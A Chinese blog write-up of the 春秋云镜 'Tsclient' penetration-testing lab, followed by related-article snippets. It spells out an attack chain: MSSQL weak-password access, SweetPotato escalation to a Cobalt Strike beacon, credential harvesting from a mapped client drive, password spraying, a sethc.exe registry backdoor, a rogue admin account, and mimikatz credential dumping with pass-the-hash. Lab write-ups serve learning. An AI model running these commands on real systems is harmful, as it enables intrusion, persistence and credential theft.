春秋云镜 ----Tsclient(kking)

最新推荐文章于 2023-12-15 21:46:29 发布
最新推荐文章于 2023-12-15 21:46:29 发布
阅读量508 收藏 6
点赞数 1
文章标签: 网络安全 安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60742333/article/details/134176233
版权

Flag 01

1、使用fscan进行扫描。     (33.99.251.254)

发现mssql弱口令漏洞,使用工具连接。

2、连接数据库使用工具完成命令执行

工具:Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar

3、当前权限为mssqlserver权限,需要提权。(此处使用得是甜土豆进行提权上线CS)

4、上线CS

(1)mssqlserver权限

 c:\users\\public\artifact_x64.exe

(2)system权限

 mssqlserver权限下输入

shell c:\users\public\sweetpotato.exe -a "c:\users\public\artifact_x64.exe"

5、在system权限下获取第一个flag。

Flag 02

1、进程注入上线jhon用户。

上线jhon用户。

jhon用户信息收集发现他的共享文件。

shell net use

shell type \\tsclient\c\credential.txt

发现疑似密码信息。

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

2、搭建代理使用kali做密码喷洒

配代理。

密码喷洒

proxychains4 -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

密码过期了,使用kali直接连接远程桌面修改密码。

proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#'

改密码完成登录。

3、先提权后获取flag 02

(1)提权

kali里太卡了,转用SocksCap64-4.7配代理远程连接。

连接成功

通过镜像劫持进行提权

powershell种输入下列操作。

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

设置镜像劫持shift后门
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

然后锁定桌面,锁屏状态按5次shift

获取flag 02

Flag 03

1、cmd中添加本地用户
net user sahx Ald@rLMWuy7Z!# /add net localgroup administrators sahx /add

2、连接刚刚创建的sahx账号

通过复制粘贴的形式将mimikatz从本地上传到远程,并以管理员身份运行。

3、minikatz提升权限
privilege::debug  #提升权限token::elevate 将权限提升至system

导出用户hash

sekurlsa::logonpasswords

获取后进行hash传递。(输入后会弹出cmd窗口)

sekurlsa::pth /user:WIN2016$ /domain:XIAORANG /ntlm:adcd60560397bbaf2cd059dfe4676f77

在 cmd窗口中输入查找flag 03 (若提示密码不正确则返回上一步查看hash值是否传递正确)

dir \\172.22.8.15\c$\Users\Administrator\flagtype \\172.22.8.15\c$\Users\Administrator\flag\flag03.txt

结束

 

Freekking
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SocksCap64-4.7.rar
06-17
SocksCap64工具
Linux提权--第三方软件MYSQL数据库提权(WEB+本地)
最新发布
金灰的博客
05-12 837
免责声明:本文仅做技术交流与学习,非法搞事后果自负...
数据库利用工具-MDUT
siu~
08-16 749
MDUT 全称 Multiple Database Utilization Tools,是一款中文的数据库跨平台利用工具,集合了多种主流的数据库类型。基于前人 SQLTOOLS 的基础开发了这套程序(向 SQLTOOLS 致敬),旨在将常见的数据库利用手段集合在一个程序中,打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂。此外工具以 JAVAFx 作为 GUI 操作界面,界面美观。同时程序还支持多数据库同时操作,每种数据库都相互独立,极大方便了网络安全工作者的使用。
4.7
zzb_226的专栏
04-07 551
无事不生非
春秋云镜-Tsclient-Writeup
qq_35607078的博客
07-12 2410
春秋云镜-Tsclient-Writeup
春秋云镜靶场Initial-WriteUP 专业徽章手把手教学
qq_45234543的博客
11-17 3660
春秋云镜靶场Initial-WP,专业徽章,完整flag获取教程
wsdl-tsclient:从wsdl生成打字稿客户端
04-03
WSDL TSClient 示例如何生成和使用: 从WSDL文件生成带有打字稿定义的。 该库正在使用生成打字稿代码和以供运行时使用。 受Java 和启发。 注意:将添加到您的npm运行时依赖项( npm i soap )安装npm i wsdl-...
TPM:TSClient LEGACY软件包管理器(TPM)-TSClient LEGACY ThinClient操作系统的软件包管理器。 它完全用OCaml编写,并使用GNU Tar,GNU Gzip和来自GNU Coreutils或类似程序的工具
02-03
TPM:TSClient LEGACY软件包管理器(TPM)-TSClient LEGACY ThinClient操作系统的软件包管理器。 它完全用OCaml编写,并使用GNU Tar,GNU Gzip和来自GNU Coreutils或类似程序的工具
TPM2:TSClient LEGACY软件包管理器(TPM)的版本2-TSClient LEGACY ThinClient操作系统的软件包管理器的第二版本完全用C ++编写。 它使用GNU Tar,zlib,TinyXML2和SQLite作为软件包数据库
02-04
TPM2:TSClient LEGACY软件包管理器(TPM)的版本2-TSClient LEGACY ThinClient操作系统的软件包管理器的第二版本完全用C ++编写。 它使用GNU Tar,zlib,TinyXML2和SQLite作为软件包数据库
TS Client-开源
05-12
TS Client是一个多用户桌面应用程序,用于注册客户的数据,例如姓名,地址,联系方式,处方以及简单的发票和付款要求。 该程序是用100%纯Java开发的。 它开箱即用。
json-serde-1.3.8-jar-with-dependencies.jar
01-03
hive json数据格式存储,支持数组和嵌套复杂数据结构解析
Terminal Server Client [tsclient]:项目已被https://sourceforge.net/projects/remmina/取代-开源
05-14
终端服务器客户端[tsclient]是rdesktop和其他远程桌面工具的GTK2前端。 该项目已被Remmina取代-https://sourceforge.net/projects/remmina/
居家办公小妙招、前后端在远程服务器上部署完成后怎么启动?
zsl2010zsl的专栏
05-09 723
一、居家办公小妙招 1.VPN连接后钉钉登不上,怎么办? 1)打开360浏览器,点击下边我框红的打开菜单按钮 2)选择工具->Internet选项,弹出Internet属性,接下来选择连接->局域网设置 输入地址和端口,点击确定 3)双击钉钉,弹出登录界面,点击右上角的网络设置,在类型里面选择使用浏览器代理,然后点击确认就能登上钉钉了 2.Navicat连不上内网数据库,怎么办? 1.安装SocksCap64-4.7 2.与管理员身份运行SocksCap64 3.把Navicat放在Soc
vulnhub raven2复现
m0_62207170的博客
03-04 836
vulnhub raven2复现
春秋云镜靶场挑战——Tsclient
Cobra的博客
03-25 2492
目标IP:39.98.73.212 网络拓扑 入口机器 1、使用namp对目标IP进行扫描,发现目标开放了1433端口(MSSQL服务),3389端口(RDP服务) 2、可以先爆破MSSQL服务,如下可以看出成爆破出密码 3、使用MDUT工具连接Mssql 4、使用xp_cmdshell执行命令发现只有一个比较地低的权限 5、使用CS生成木马,利用MDUT上传木马 6、执行木马上线CS C:/Users/Public/beacon.exe 7、使用土豆提
春秋云镜-【仿真场景】Brute4Road writeup
渗透测试研究中心
03-07 1003
说明Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。技术Redis、Brute Force、SMB、Privilege Elevation、域渗透第一个flagredis主从复制RCEf...
i春秋云镜Tsclient
weixin_65550121的博客
12-15 970
因为它在远程连接我们的时候把磁盘也挂载过来了,这里由于我们不能让对面那台主机重启所以我们不能通过写启动项的方式让他上线但我们在对方的C盘发现了一个用户以及提示的信息接下来就是进一步的操作这里先把权限切换到John用户。因为对方远程登录的是这个桌面这里切忌一定不要远程上去你一旦远程上去 对方的连接就会断开 他的C盘也会断开所以你收集不到他的磁盘信息了迁移到John的进程上去。我们可以发现这里面都是windows的机器,我们先提权。我们发现是权限是mssql权限,所以我们需要提权。
靶场练习--春秋云境-Tsclient
NoooEmotion的博客
01-28 2132
Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。
【红队攻防】个人总结、工具、大量干货
em.....
07-24 935
难不成是服务器的原因,好,换,我换了5个服务器,最后在同事的一个服务器上成功接到了shell。对于蜜罐后来我也发现了个检测思路,当然不能囊括所有,不过在此次演练中,这个思路还是比较奏效的,就是扫描了两遍,第一次使用了默认字典,第二次指定了一个小的用户名、字典,然后对比两次结果,发现蜜罐有一个特点,就是比如第一次扫描出现了弱口令是admin,admin 而第二次扫描IP是相同的,但是弱口令变成了admin,123456,那这个时候就要注意了,十有八九是个蜜罐,虽然抓不到什么东西,但是浪费时间也是很难受的。
\\TSCLIENT\D\ZP20.XLS,是什么意思
03-20
很抱歉,根据你提供的信息,我无法准确回答你关于"\\TSCLIENT\D\ZP20.XLS"的问题。"\\TSCLIENT\D\ZP20.XLS"看起来像是一个文件路径,但我无法确定具体是什么文件或者它的含义。如果你能提供更多的背景信息或者问题的上下文,我将尽力帮助你解答。以下是一些可能有助于你的问题: 1. "TSCLIENT"是什么意思? 2. "D"代表什么? 3. "ZP20.XLS"是什么类型的文件? 4. 你需要关于该文件的哪方面的信息? 请提供更多详细信息,以便我能够更好地回答你的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值